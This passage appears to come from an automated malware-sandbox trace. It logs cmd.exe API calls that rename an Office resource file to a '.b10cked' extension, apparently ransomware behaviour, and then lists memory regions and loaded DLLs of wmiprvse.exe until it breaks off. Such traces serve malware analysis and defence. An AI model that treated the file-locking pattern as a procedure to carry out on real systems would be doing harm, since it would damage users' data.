(_String1="move", _String2="ENDLOCAL") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="START") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0174.266] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0174.268] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.268] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.268] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f384, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f37c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f37c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.270] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~1.trx")) returned 0x2020 [0174.270] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.270] SetErrorMode (uMode=0x0) returned 0x0 [0174.270] SetErrorMode (uMode=0x1) returned 0x0 [0174.270] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x26ed0c, lpFilePart=0x26ecf4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", lpFilePart=0x26ecf4*="WWINTL~1.TRX") returned 0x3c [0174.270] SetErrorMode (uMode=0x0) returned 0x1 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~1.trx")) returned 0x2020 [0174.271] SetErrorMode (uMode=0x0) returned 0x0 [0174.271] SetErrorMode (uMode=0x1) returned 0x0 [0174.271] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x26f188, lpFilePart=0x26ef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", lpFilePart=0x26ef20*="WWINTL~1.TRX") returned 0x3c [0174.271] SetErrorMode (uMode=0x0) returned 0x1 [0174.271] SetErrorMode (uMode=0x0) returned 0x0 [0174.271] SetErrorMode (uMode=0x1) returned 0x0 [0174.271] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f390, lpFilePart=0x26ef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x26ef20*="WWINTL.DLL.trx_dll.b10cked") returned 0x4a [0174.271] SetErrorMode (uMode=0x0) returned 0x1 [0174.271] SetLastError (dwErrCode=0x0) [0174.271] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll.b10cked")) returned 0xffffffff [0174.271] GetLastError () returned 0x2 [0174.271] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e89c) returned 0x3d2128 [0174.271] FindNextFileW (in: hFindFile=0x3d2128, lpFindFileData=0x26e89c | out: lpFindFileData=0x26e89c) returned 0 [0174.272] GetLastError () returned 0x12 [0174.272] FindClose (in: hFindFile=0x3d2128 | out: hFindFile=0x3d2128) returned 1 [0174.274] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cb8) returned 0x3d2128 [0174.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0174.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0174.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll")) returned 0x2020 [0174.274] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0174.275] FindClose (in: hFindFile=0x3d2128 | out: hFindFile=0x3d2128) returned 1 [0174.275] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eae8 | out: _Buffer=" 1") returned 9 [0174.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.275] GetFileType (hFile=0x7) returned 0x2 [0174.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea74 | out: lpMode=0x26ea74) returned 1 [0174.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eaa8 | out: lpConsoleScreenBufferInfo=0x26eaa8) returned 1 [0174.281] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0174.281] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eae8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0174.282] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eacc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eacc*=0x1a) returned 1 [0174.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0174.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.282] SetConsoleInputExeNameW () returned 0x1 [0174.282] GetConsoleOutputCP () returned 0x1b5 [0174.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.282] exit (_Code=0) Process: id = "308" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ea16b60" os_pid = "0xd0c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006a015" [0xc000000f] Region: id = 24310 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24311 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24312 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24313 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 24314 start_va = 0xf50000 end_va = 0xf90fff entry_point = 0xf50000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 24315 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24316 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24317 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24318 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24319 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24320 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24321 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24322 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 24323 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 24324 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 24325 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 24326 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 24327 start_va = 0x73d70000 end_va = 0x73d7efff entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 24328 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24329 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24330 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24331 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24332 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24333 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24334 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24335 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24336 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24337 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24338 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24339 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24340 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24341 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24342 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24343 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24344 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24345 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24346 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24347 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 24348 start_va = 0x110000 end_va = 0x116fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 24349 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 24350 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 24351 start_va = 0x370000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 24352 start_va = 0x480000 end_va = 0x4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24353 start_va = 0x500000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 24354 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 24355 start_va = 0x5d0000 end_va = 0x89efff entry_point = 0x5d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24356 start_va = 0x8a0000 end_va = 0xc92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 24357 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 24358 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 24359 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 24360 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 24361 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 24362 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 24363 start_va = 0xda0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 24364 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 24365 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 24366 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24367 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24368 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 24369 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 24370 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 24371 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 24372 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 24373 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 24374 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 24395 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 24396 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 24397 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 24398 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24399 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24430 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 24431 start_va = 0x6e880000 end_va = 0x6e896fff entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 24432 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24548 start_va = 0x6bd60000 end_va = 0x6bea9fff entry_point = 0x6bd60000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 24549 start_va = 0x6f920000 end_va = 0x6f954fff entry_point = 0x6f920000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 24550 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 24551 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 24647 start_va = 0xde0000 end_va = 0xde1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 24648 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 24649 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 24650 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 24651 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 28199 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28257 start_va = 0x6e2b0000 end_va = 0x6e2b2fff entry_point = 0x6e2b0000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 28258 